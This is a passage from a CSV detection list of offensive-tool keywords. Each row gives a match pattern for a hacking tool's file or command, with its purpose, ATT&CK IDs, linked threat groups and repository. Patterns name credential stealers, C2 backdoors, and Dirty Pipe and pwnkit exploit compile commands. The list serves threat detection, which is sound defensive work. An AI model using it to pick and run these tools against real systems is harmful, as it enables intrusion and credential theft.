archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","45480" "*GateTrampolin.asm*",".{0,1000}GateTrampolin\.asm.{0,1000}","offensive_tool_keyword","RecycledInjector","Native Syscalls Shellcode Injector","T1055.012 - T1055.001 - T1547.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/florylsk/RecycledInjector","1","1","N/A","N/A","N/A","3","266","43","2023-07-02T11:04:28Z","2023-06-23T16:14:56Z","45481" "*gateway-finder*",".{0,1000}gateway\-finder.{0,1000}","offensive_tool_keyword","gateway-finder-imp","This is an improved version of original Gateway-finder. New version rebuilt with python3 and support for files with MACs/IPs The homepage of original project is: http://pentestmonkey.net/tools/gateway-finder Gateway-finder is a scapy script that will help you determine which of the systems on the local LAN has IP forwarding enabled and which can reach the Internet.","T1016 - T1049 - T1213 - T1021","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Data Exfiltration","https://github.com/whitel1st/gateway-finder-imp","1","0","N/A","N/A","N/A","1","64","6","2024-01-28T17:04:10Z","2018-04-18T12:43:11Z","45483" "*gather/credentials/rdc_manager_creds*",".{0,1000}gather\/credentials\/rdc_manager_creds.{0,1000}","offensive_tool_keyword","metasploit-payloads","shell payload","T1059.001 - T1027 - T1210.001","TA0002 - TA0003 - TA0007","N/A","N/A","Framework","https://github.com/rapid7/metasploit-payloads","1","0","N/A","N/A","10","10","1819","689","2025-02-13T15:01:44Z","2014-04-03T21:18:24Z","45484" "*gather/credentials/teamviewer_passwords*",".{0,1000}gather\/credentials\/teamviewer_passwords.{0,1000}","offensive_tool_keyword","metasploit-payloads","shell payload","T1059.001 - T1027 - T1210.001","TA0002 - TA0003 - 
TA0007","N/A","N/A","Framework","https://github.com/rapid7/metasploit-payloads","1","0","N/A","N/A","10","10","1819","689","2025-02-13T15:01:44Z","2014-04-03T21:18:24Z","45485" "*gather/credentials/windows_autologin*",".{0,1000}gather\/credentials\/windows_autologin.{0,1000}","offensive_tool_keyword","metasploit-payloads","shell payload","T1059.001 - T1027 - T1210.001","TA0002 - TA0003 - TA0007","N/A","N/A","Framework","https://github.com/rapid7/metasploit-payloads","1","0","N/A","N/A","10","10","1819","689","2025-02-13T15:01:44Z","2014-04-03T21:18:24Z","45486" "*gather/enum_ad_bitlocker*",".{0,1000}gather\/enum_ad_bitlocker.{0,1000}","offensive_tool_keyword","metasploit-payloads","shell payload","T1059.001 - T1027 - T1210.001","TA0002 - TA0003 - TA0007","N/A","N/A","Framework","https://github.com/rapid7/metasploit-payloads","1","0","N/A","N/A","10","10","1819","689","2025-02-13T15:01:44Z","2014-04-03T21:18:24Z","45487" "*gather/enum_ad_computers*",".{0,1000}gather\/enum_ad_computers.{0,1000}","offensive_tool_keyword","metasploit-payloads","shell payload","T1059.001 - T1027 - T1210.001","TA0002 - TA0003 - TA0007","N/A","N/A","Framework","https://github.com/rapid7/metasploit-payloads","1","0","N/A","N/A","10","10","1819","689","2025-02-13T15:01:44Z","2014-04-03T21:18:24Z","45488" "*gather/enum_ad_groups*",".{0,1000}gather\/enum_ad_groups.{0,1000}","offensive_tool_keyword","metasploit-payloads","shell payload","T1059.001 - T1027 - T1210.001","TA0002 - TA0003 - TA0007","N/A","N/A","Framework","https://github.com/rapid7/metasploit-payloads","1","0","N/A","N/A","10","10","1819","689","2025-02-13T15:01:44Z","2014-04-03T21:18:24Z","45489" "*gather/enum_ad_managedby_groups*",".{0,1000}gather\/enum_ad_managedby_groups.{0,1000}","offensive_tool_keyword","metasploit-payloads","shell payload","T1059.001 - T1027 - T1210.001","TA0002 - TA0003 - 
TA0007","N/A","N/A","Framework","https://github.com/rapid7/metasploit-payloads","1","0","N/A","N/A","10","10","1819","689","2025-02-13T15:01:44Z","2014-04-03T21:18:24Z","45490" "*gather/enum_ad_to_wordlist*",".{0,1000}gather\/enum_ad_to_wordlist.{0,1000}","offensive_tool_keyword","metasploit-payloads","shell payload","T1059.001 - T1027 - T1210.001","TA0002 - TA0003 - TA0007","N/A","N/A","Framework","https://github.com/rapid7/metasploit-payloads","1","0","N/A","N/A","10","10","1819","689","2025-02-13T15:01:44Z","2014-04-03T21:18:24Z","45491" "*gather/enum_ad_user_comments*",".{0,1000}gather\/enum_ad_user_comments.{0,1000}","offensive_tool_keyword","metasploit-payloads","shell payload","T1059.001 - T1027 - T1210.001","TA0002 - TA0003 - TA0007","N/A","N/A","Framework","https://github.com/rapid7/metasploit-payloads","1","0","N/A","N/A","10","10","1819","689","2025-02-13T15:01:44Z","2014-04-03T21:18:24Z","45492" "*gather/enum_logged_on_users*",".{0,1000}gather\/enum_logged_on_users.{0,1000}","offensive_tool_keyword","metasploit-payloads","shell payload","T1059.001 - T1027 - T1210.001","TA0002 - TA0003 - TA0007","N/A","N/A","Framework","https://github.com/rapid7/metasploit-payloads","1","0","N/A","N/A","10","10","1819","689","2025-02-13T15:01:44Z","2014-04-03T21:18:24Z","45493" "*gather/enum_logged_on_users*",".{0,1000}gather\/enum_logged_on_users.{0,1000}","offensive_tool_keyword","metasploit-payloads","shell payload","T1059.001 - T1027 - T1210.001","TA0002 - TA0003 - TA0007","N/A","N/A","Framework","https://github.com/rapid7/metasploit-payloads","1","0","N/A","N/A","10","10","1819","689","2025-02-13T15:01:44Z","2014-04-03T21:18:24Z","45494" "*gather/enum_putty_saved_sessions*",".{0,1000}gather\/enum_putty_saved_sessions.{0,1000}","offensive_tool_keyword","metasploit-payloads","shell payload","T1059.001 - T1027 - T1210.001","TA0002 - TA0003 - 
TA0007","N/A","N/A","Framework","https://github.com/rapid7/metasploit-payloads","1","0","N/A","N/A","10","10","1819","689","2025-02-13T15:01:44Z","2014-04-03T21:18:24Z","45495" "*gather/keylogger*",".{0,1000}gather\/keylogger.{0,1000}","offensive_tool_keyword","cobaltstrike","CrossC2 developed based on the Cobalt Strike framework can be used for other cross-platform system control. CrossC2Kit provides some interfaces for users to call to manipulate the CrossC2 Beacon session. thereby extending the functionality of Cobalt Strike.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - 
Sandworm","C2","https://github.com/CrossC2/CrossC2Kit","1","1","N/A","N/A","10","10","218","37","2023-08-08T19:52:07Z","2022-06-06T07:00:10Z","45496" "*gather/ldap_query*",".{0,1000}gather\/ldap_query.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","45497" "*gather/peass.rb*",".{0,1000}gather\/peass\.rb.{0,1000}","offensive_tool_keyword","PEASS","PEASS - Privilege Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/carlospolop/PEASS-ng","1","1","N/A","N/A","N/A","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","45498" 
"*gather/user_hunter*",".{0,1000}gather\/user_hunter.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1548.002 - T1071.001 - T1547.001 - T1115 - T1059.001 - T1059.003 - T1059.005 - T1005 - T1573.002 - T1083 - T1564.003 - T1105 - T1046 - T1135 - T1003.002 - T1003.003 - T1055.001 - T1021.001 - T1053.005 - T1218.005 - T1218.010 - T1218.011 - T1082 - T1016 - T1033 - T1569.002 - T1047","TA0004 - TA0011 - TA0003 - TA0008 - TA0002 - TA0009 - TA0010 - TA0005 - TA0006 - TA0007","N/A","PYSA - BlackCat - Black Basta - LockBit - APT28 - LazyScripter - Sidewinder - MuddyWater - FANCY BEAR","C2","https://github.com/offsecginger/koadic","1","1","N/A","N/A","10","10","290","83","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z","45499" "*gatherer/gatherer.py*",".{0,1000}gatherer\/gatherer\.py.{0,1000}","offensive_tool_keyword","jackdaw","Jackdaw is here to collect all information in your domain. store it in a SQL database and show you nice graphs on how your domain objects interact with each-other an how a potential attacker may exploit these interactions. 
It also comes with a handy feature to help you in a password-cracking project by storing/looking up/reporting hashes/passowrds/users.","T1087 - T1482 - T1201 - T1213 - T1003","TA0007 - TA0008 - TA0009 - TA0006","N/A","N/A","Reconnaissance","https://github.com/skelsec/jackdaw","1","1","N/A","N/A","N/A","6","576","89","2025-03-15T13:37:50Z","2019-03-27T18:36:41Z","45500" "*gato * attack*",".{0,1000}gato\s.{0,1000}\sattack.{0,1000}","offensive_tool_keyword","gato","GitHub Self-Hosted Runner Enumeration and Attack Tool","T1083 - T1087 - T1081","TA0006 - TA0007","N/A","N/A","Reconnaissance","https://github.com/praetorian-inc/gato","1","0","N/A","N/A","N/A","7","630","55","2025-04-10T23:25:04Z","2023-01-06T15:43:27Z","45501" "*gato * enumerate*",".{0,1000}gato\s.{0,1000}\senumerate.{0,1000}","offensive_tool_keyword","gato","GitHub Self-Hosted Runner Enumeration and Attack Tool","T1083 - T1087 - T1081","TA0006 - TA0007","N/A","N/A","Reconnaissance","https://github.com/praetorian-inc/gato","1","0","N/A","N/A","N/A","7","630","55","2025-04-10T23:25:04Z","2023-01-06T15:43:27Z","45502" "*gato * --http-proxy*",".{0,1000}gato\s.{0,1000}\s\-\-http\-proxy.{0,1000}","offensive_tool_keyword","gato","GitHub Self-Hosted Runner Enumeration and Attack Tool","T1083 - T1087 - T1081","TA0006 - TA0007","N/A","N/A","Reconnaissance","https://github.com/praetorian-inc/gato","1","0","N/A","N/A","N/A","7","630","55","2025-04-10T23:25:04Z","2023-01-06T15:43:27Z","45503" "*gato * --socks-proxy*",".{0,1000}gato\s.{0,1000}\s\-\-socks\-proxy.{0,1000}","offensive_tool_keyword","gato","GitHub Self-Hosted Runner Enumeration and Attack Tool","T1083 - T1087 - T1081","TA0006 - TA0007","N/A","N/A","Reconnaissance","https://github.com/praetorian-inc/gato","1","0","N/A","N/A","N/A","7","630","55","2025-04-10T23:25:04Z","2023-01-06T15:43:27Z","45504" "*gato_x-0.5.3-py3-none-any.whl*",".{0,1000}gato_x\-0\.5\.3\-py3\-none\-any\.whl.{0,1000}","offensive_tool_keyword","Gato-X","automate advanced enumeration and 
exploitation techniques against GitHub repositories and organizations","T1190 - T1083 - T1588 - T1587","TA0001 - TA0007 - TA0005","N/A","N/A","Reconnaissance","https://github.com/adnanekhan/Gato-X","1","1","N/A","N/A","7","3","270","35","2025-04-21T17:57:09Z","2024-01-27T18:55:16Z","45505" "*gato-x attack *",".{0,1000}gato\-x\sattack\s.{0,1000}","offensive_tool_keyword","Gato-X","automate advanced enumeration and exploitation techniques against GitHub repositories and organizations","T1190 - T1083 - T1588 - T1587","TA0001 - TA0007 - TA0005","N/A","N/A","Reconnaissance","https://github.com/adnanekhan/Gato-X","1","0","N/A","N/A","7","3","270","35","2025-04-21T17:57:09Z","2024-01-27T18:55:16Z","45506" "*gato-x enum *",".{0,1000}gato\-x\senum\s.{0,1000}","offensive_tool_keyword","Gato-X","automate advanced enumeration and exploitation techniques against GitHub repositories and organizations","T1190 - T1083 - T1588 - T1587","TA0001 - TA0007 - TA0005","N/A","N/A","Reconnaissance","https://github.com/adnanekhan/Gato-X","1","0","N/A","N/A","7","3","270","35","2025-04-21T17:57:09Z","2024-01-27T18:55:16Z","45507" "*gato-x search *",".{0,1000}gato\-x\ssearch\s.{0,1000}","offensive_tool_keyword","Gato-X","automate advanced enumeration and exploitation techniques against GitHub repositories and organizations","T1190 - T1083 - T1588 - T1587","TA0001 - TA0007 - TA0005","N/A","N/A","Reconnaissance","https://github.com/adnanekhan/Gato-X","1","0","N/A","N/A","7","3","270","35","2025-04-21T17:57:09Z","2024-01-27T18:55:16Z","45508" "*gatox.cli.search*",".{0,1000}gatox\.cli\.search.{0,1000}","offensive_tool_keyword","Gato-X","automate advanced enumeration and exploitation techniques against GitHub repositories and organizations","T1190 - T1083 - T1588 - T1587","TA0001 - TA0007 - TA0005","N/A","N/A","Reconnaissance","https://github.com/adnanekhan/Gato-X","1","0","N/A","N/A","7","3","270","35","2025-04-21T17:57:09Z","2024-01-27T18:55:16Z","45509" 
"*gatox.enumerate.reports.report*",".{0,1000}gatox\.enumerate\.reports\.report.{0,1000}","offensive_tool_keyword","Gato-X","automate advanced enumeration and exploitation techniques against GitHub repositories and organizations","T1190 - T1083 - T1588 - T1587","TA0001 - TA0007 - TA0005","N/A","N/A","Reconnaissance","https://github.com/adnanekhan/Gato-X","1","0","N/A","N/A","7","3","270","35","2025-04-21T17:57:09Z","2024-01-27T18:55:16Z","45510" "*gatox.git.utils.subprocess.run*",".{0,1000}gatox\.git\.utils\.subprocess\.run.{0,1000}","offensive_tool_keyword","Gato-X","automate advanced enumeration and exploitation techniques against GitHub repositories and organizations","T1190 - T1083 - T1588 - T1587","TA0001 - TA0007 - TA0005","N/A","N/A","Reconnaissance","https://github.com/adnanekhan/Gato-X","1","0","N/A","N/A","7","3","270","35","2025-04-21T17:57:09Z","2024-01-27T18:55:16Z","45511" "*gatox.github.api.open*",".{0,1000}gatox\.github\.api\.open.{0,1000}","offensive_tool_keyword","Gato-X","automate advanced enumeration and exploitation techniques against GitHub repositories and organizations","T1190 - T1083 - T1588 - T1587","TA0001 - TA0007 - TA0005","N/A","N/A","Reconnaissance","https://github.com/adnanekhan/Gato-X","1","0","N/A","N/A","7","3","270","35","2025-04-21T17:57:09Z","2024-01-27T18:55:16Z","45512" "*gatox.github.api.requests.post*",".{0,1000}gatox\.github\.api\.requests\.post.{0,1000}","offensive_tool_keyword","Gato-X","automate advanced enumeration and exploitation techniques against GitHub repositories and organizations","T1190 - T1083 - T1588 - T1587","TA0001 - TA0007 - TA0005","N/A","N/A","Reconnaissance","https://github.com/adnanekhan/Gato-X","1","0","N/A","N/A","7","3","270","35","2025-04-21T17:57:09Z","2024-01-27T18:55:16Z","45513" "*gatox.github.search*",".{0,1000}gatox\.github\.search.{0,1000}","offensive_tool_keyword","Gato-X","automate advanced enumeration and exploitation techniques against GitHub repositories and organizations","T1190 - 
T1083 - T1588 - T1587","TA0001 - TA0007 - TA0005","N/A","N/A","Reconnaissance","https://github.com/adnanekhan/Gato-X","1","0","N/A","N/A","7","3","270","35","2025-04-21T17:57:09Z","2024-01-27T18:55:16Z","45514" "*gc2-sheet.go*",".{0,1000}gc2\-sheet\.go.{0,1000}","offensive_tool_keyword","GC2-sheet","GC2 is a Command and Control application that allows an attacker to execute commands on the target machine using Google Sheet and exfiltrate data using Google Drive.","T1071.002 - T1560 - T1105","TA0011 - TA0010 - TA0008","N/A","N/A","C2","https://github.com/looCiprian/GC2-sheet","1","1","N/A","N/A","10","10","578","111","2025-03-28T19:48:36Z","2021-09-15T19:06:12Z","45517" "*GC2-sheet/cmd*",".{0,1000}GC2\-sheet\/cmd.{0,1000}","offensive_tool_keyword","GC2-sheet","GC2 is a Command and Control application that allows an attacker to execute commands on the target machine using Google Sheet and exfiltrate data using Google Drive.","T1071.002 - T1560 - T1105","TA0011 - TA0010 - TA0008","N/A","N/A","C2","https://github.com/looCiprian/GC2-sheet","1","1","N/A","N/A","10","10","578","111","2025-03-28T19:48:36Z","2021-09-15T19:06:12Z","45518" "*gcat*implant.py*",".{0,1000}gcat.{0,1000}implant\.py.{0,1000}","offensive_tool_keyword","gcat","A PoC backdoor that uses Gmail as a C&C server","T1071.001 - T1094 - T1102.002","TA0011 - TA0010 - TA0008","N/A","Sandworm","C2","https://github.com/byt3bl33d3r/gcat","1","1","N/A","N/A","10","10","1332","425","2018-11-16T13:43:15Z","2015-06-03T01:28:00Z","45519" "*gcat.is.the.shit@gmail.com*",".{0,1000}gcat\.is\.the\.shit\@gmail\.com.{0,1000}","offensive_tool_keyword","gcat","A PoC backdoor that uses Gmail as a C&C server","T1071.001 - T1094 - T1102.002","TA0011 - TA0010 - TA0008","N/A","Sandworm","C2","https://github.com/byt3bl33d3r/gcat","1","0","#email","N/A","10","10","1332","425","2018-11-16T13:43:15Z","2015-06-03T01:28:00Z","45520" "*gcc cve_2022_0847.c -o 
exploit*",".{0,1000}gcc\scve_2022_0847\.c\s\-o\sexploit.{0,1000}","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","T1204 - T1055 - T1003 - T1015 - T1068 - T1059 - T1047","TA0001 - TA0002 - TA0003 - TA0008","N/A","N/A","Exploitation tool","https://github.com/ahrixia/CVE_2022_0847","1","0","N/A","N/A","N/A","1","21","15","2022-03-08T13:15:35Z","2022-03-08T12:43:43Z","45521" "*gcc dirtypipez.c*",".{0,1000}gcc\sdirtypipez\.c.{0,1000}","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","T1533","TA0003","N/A","N/A","Exploitation tool","https://github.com/febinrev/dirtypipez-exploit","1","0","N/A","N/A","N/A","1","51","22","2022-03-08T11:52:22Z","2022-03-08T11:49:40Z","45522" "*gcc exploit-1.c -o exploit-1*",".{0,1000}gcc\sexploit\-1\.c\s\-o\sexploit\-1.{0,1000}","offensive_tool_keyword","POC","exploit the Linux Dirty Pipe vulnerability","T1068 - T1078.003 - T1071.004 - T1072 - T1105","TA0004 - TA0006?","N/A","N/A","Privilege Escalation","https://github.com/AlexisAhmed/CVE-2022-0847-DirtyPipe-Exploits","1","0","N/A","N/A","10","6","595","148","2023-05-20T05:55:45Z","2022-03-12T20:57:24Z","45523" "*gcc exploit-2.c -o exploit-2*",".{0,1000}gcc\sexploit\-2\.c\s\-o\sexploit\-2.{0,1000}","offensive_tool_keyword","POC","exploit the Linux Dirty Pipe vulnerability","T1068 - T1078.003 - T1071.004 - T1072 - T1105","TA0004 - TA0006?","N/A","N/A","Privilege Escalation","https://github.com/AlexisAhmed/CVE-2022-0847-DirtyPipe-Exploits","1","0","#linux","N/A","10","6","595","148","2023-05-20T05:55:45Z","2022-03-12T20:57:24Z","45524" "*gconv-modules*",".{0,1000}gconv\-modules.{0,1000}","offensive_tool_keyword","POC","Exploit for the pwnkit vulnerability (https://www.qualys.com/2022/01/25/cve-2021-4034/pwnkit.txt) from the Qualys team","T1068","TA0004","N/A","N/A","Exploitation tool","https://github.com/Ayrx/CVE-2021-4034","1","0","N/A","N/A","N/A","1","93","14","2022-01-27T11:57:05Z","2022-01-26T03:33:47Z","45528" 
"*gcp_functionalc2.profile*",".{0,1000}gcp_functionalc2\.profile.{0,1000}","offensive_tool_keyword","FunctionalC2","A small POC of using Azure Functions to relay communications","T1021.006 - T1132.002 - T1071.001","TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/FortyNorthSecurity/FunctionalC2","1","1","N/A","N/A","10","10","74","17","2023-03-30T20:27:38Z","2020-03-12T17:54:50Z","45529" "*GCPBucketBrute*",".{0,1000}GCPBucketBrute.{0,1000}","offensive_tool_keyword","GCPBucketBrute","A script to enumerate Google Storage buckets. determine what access you have to them. and determine if they can be privilege escalated","T1083 - T1553 - T1210 - T1213","TA0001 - TA0009 - TA0011","N/A","N/A","Exploitation tool","https://github.com/RhinoSecurityLabs/GCPBucketBrute","1","0","N/A","N/A","N/A","6","516","86","2023-05-26T19:11:42Z","2019-02-26T03:56:22Z","45530" "*GCR - Google Calendar RAT*",".{0,1000}GCR\s\-\sGoogle\sCalendar\sRAT.{0,1000}","offensive_tool_keyword","GCR-Google-Calendar-RAT","Google Calendar RAT is a PoC of Command&Control over Google Calendar Events","T1071.001 - T1021.002 - T1059","TA0002 - TA0005","N/A","N/A","C2","https://github.com/MrSaighnal/GCR-Google-Calendar-RAT","1","0","N/A","N/A","10","10","215","41","2024-04-11T18:06:02Z","2023-06-18T13:23:31Z","45531" "*GCR-Google-Calendar-RAT*",".{0,1000}GCR\-Google\-Calendar\-RAT.{0,1000}","offensive_tool_keyword","GCR-Google-Calendar-RAT","Google Calendar RAT is a PoC of Command&Control over Google Calendar Events","T1071.001 - T1021.002 - T1059","TA0002 - TA0005","N/A","N/A","C2","https://github.com/MrSaighnal/GCR-Google-Calendar-RAT","1","1","N/A","N/A","10","10","215","41","2024-04-11T18:06:02Z","2023-06-18T13:23:31Z","45532" "*GDSSecurity/PSAttack*",".{0,1000}GDSSecurity\/PSAttack.{0,1000}","offensive_tool_keyword","PSAttack","PSAttack contains over 100 commands for Privilege Escalation - Recon and Data Exfilitration","T1059 - T1212 - T1012 - T1087 - T1005 - T1041 - T1020","TA0002 - TA0004 - 
TA0005 - TA0007 - TA0010 - TA0008","N/A","N/A","Exploitation tool","https://github.com/GDSSecurity/PSAttack","1","1","N/A","N/A","10","1","45","15","2017-04-04T20:37:33Z","2016-02-22T23:45:22Z","45534" "*geacon*/cmd/*",".{0,1000}geacon.{0,1000}\/cmd\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Practice Go programming and implement CobaltStrike's Beacon in Go","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/darkr4y/geacon","1","1","N/A","N/A","10","10","1189","206","2020-10-02T10:34:37Z","2020-02-14T14:01:29Z","45535" "*Gecko Bookmarks Snatch 
Failed*",".{0,1000}Gecko\sBookmarks\sSnatch\sFailed.{0,1000}","offensive_tool_keyword","BrowserSnatch","steals important data from all chromium and gecko browsers installed in the system and gather the data in a stealer db to be exfiltrated out. A powerful Browser Stealer","T1081 - T1074 - T1114 - T1005 - T1041 - T1027","TA0006 - TA0009 - TA0010","N/A","N/A","Data Exfiltration","https://github.com/shaddy43/BrowserSnatch","1","0","#content","N/A","10","3","246","39","2025-03-31T21:04:30Z","2024-08-26T18:38:42Z","45536" "*Gecko Cookie Snatch Failed*",".{0,1000}Gecko\sCookie\sSnatch\sFailed.{0,1000}","offensive_tool_keyword","BrowserSnatch","steals important data from all chromium and gecko browsers installed in the system and gather the data in a stealer db to be exfiltrated out. A powerful Browser Stealer","T1081 - T1074 - T1114 - T1005 - T1041 - T1027","TA0006 - TA0009 - TA0010","N/A","N/A","Data Exfiltration","https://github.com/shaddy43/BrowserSnatch","1","0","#content","N/A","10","3","246","39","2025-03-31T21:04:30Z","2024-08-26T18:38:42Z","45537" "*Gecko History Snatch Failed*",".{0,1000}Gecko\sHistory\sSnatch\sFailed.{0,1000}","offensive_tool_keyword","BrowserSnatch","steals important data from all chromium and gecko browsers installed in the system and gather the data in a stealer db to be exfiltrated out. A powerful Browser Stealer","T1081 - T1074 - T1114 - T1005 - T1041 - T1027","TA0006 - TA0009 - TA0010","N/A","N/A","Data Exfiltration","https://github.com/shaddy43/BrowserSnatch","1","0","#content","N/A","10","3","246","39","2025-03-31T21:04:30Z","2024-08-26T18:38:42Z","45538" "*Gecko Password Snatch Failed*",".{0,1000}Gecko\sPassword\sSnatch\sFailed.{0,1000}","offensive_tool_keyword","BrowserSnatch","steals important data from all chromium and gecko browsers installed in the system and gather the data in a stealer db to be exfiltrated out. 
A powerful Browser Stealer","T1081 - T1074 - T1114 - T1005 - T1041 - T1027","TA0006 - TA0009 - TA0010","N/A","N/A","Data Exfiltration","https://github.com/shaddy43/BrowserSnatch","1","0","#content","N/A","10","3","246","39","2025-03-31T21:04:30Z","2024-08-26T18:38:42Z","45539" "*geli2john.py*",".{0,1000}geli2john\.py.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","45540" "*gem 'evil-proxy'*",".{0,1000}gem\s\'evil\-proxy\'.{0,1000}","offensive_tool_keyword","evil-proxy","A ruby http/https proxy to do EVIL things","T1557 - T1110.001 - T1563.001","TA0006 - TA0001 - TA0009 - TA0040","N/A","N/A","Phishing","https://github.com/bbtfr/evil-proxy","1","0","N/A","N/A","9","2","172","96","2023-10-30T07:49:40Z","2015-07-30T01:54:40Z","45541" "*gemailhack.py*",".{0,1000}gemailhack\.py.{0,1000}","offensive_tool_keyword","SocialBox-Termux","SocialBox is a Bruteforce Attack Framework Facebook - Gmail - Instagram - Twitter for termux on android","T1110.001 - T1110.003 - T1078.003","TA0001 - TA0006 - TA0040","N/A","N/A","Credential Access","https://github.com/Ha3MrX/Gemail-Hack","1","1","N/A","N/A","7","10","1062","400","2024-01-17T15:12:44Z","2018-04-19T13:48:41Z","45542" "*gen -f py bind --port*",".{0,1000}gen\s\-f\spy\sbind\s\-\-port.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - 
